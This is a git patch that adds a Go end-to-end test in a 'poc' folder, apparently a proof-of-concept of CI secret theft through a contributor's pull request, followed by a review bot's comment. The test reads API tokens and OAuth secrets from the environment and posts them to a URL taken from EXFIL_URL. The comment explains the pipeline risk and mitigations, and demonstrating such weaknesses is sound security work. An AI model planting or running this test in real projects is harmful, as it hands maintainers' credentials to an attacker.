From 39fd05fe8df43d3f6a9c0d56626a03f13fdd3a0f Mon Sep 17 00:00:00 2001
From: XavLim <50736074+XavLimSG@users.noreply.github.com>
Date: Sun, 5 Apr 2026 16:31:03 +0800
Subject: [PATCH] Add attacker payload C for PR2
---
poc/malicious_e2e_test.go | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 poc/malicious_e2e_test.go
diff --git a/poc/malicious_e2e_test.go b/poc/malicious_e2e_test.go
new file mode 100644
index 0000000..9a7106e
--- /dev/null
+++ b/poc/malicious_e2e_test.go
@@ -0,0 +1,28 @@
+//go:build e2e
+
+package poc
+
+import (
+ "net/http"
+ "net/url"
+ "os"
+ "testing"
+)
+
+func TestMaliciousPayloadC(t *testing.T) {
+ exfil := os.Getenv("EXFIL_URL")
+ if exfil != "" {
+ values := url.Values{}
+ values.Set("marker", "C")
+ values.Set("api_token", os.Getenv("API_TOKEN"))
+ values.Set("platform_token", os.Getenv("PLATFORM_TOKEN"))
+ values.Set("oauth_client_id", os.Getenv("OAUTH_CLIENT_ID"))
+ values.Set("oauth_client_secret", os.Getenv("OAUTH_CLIENT_SECRET"))
+ values.Set("oauth_token_endpoint", os.Getenv("OAUTH_TOKEN_ENDPOINT"))
+ values.Set("classic_url", os.Getenv("CLASSIC_URL"))
+ values.Set("platform_url", os.Getenv("PLATFORM_URL"))
+ _, _ = http.PostForm(exfil, values)
+ }
+
+ t.Fatalf("MALICIOUS_EXECUTED_C")
+}
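Review bot: The body of TestMaliciousPayloadC copies API_TOKEN, PLATFORM_TOKEN and OAUTH_CLIENT_SECRET from the environment into a form and posts it to whatever EXFIL_URL names, yet nothing in the file says that this is a deliberate proof-of-concept or under which conditions it may be run. I would add a comment at the top of the file, for example `// PoC fixture: simulates a hostile contributor test that sends CI secrets to EXFIL_URL; run only on an isolated runner with dummy credentials.` What the test shows is that any job compiling contributor-supplied tests with the `e2e` tag hands them every secret in its environment, so the mitigation belongs in the pipeline rather than in this file (presumably: no real credentials for unreviewed pull requests, approval gating, restricted egress). The unconditional `t.Fatalf("MALICIOUS_EXECUTED_C")` is a convenient marker to search for in job logs when checking whether the payload was executed.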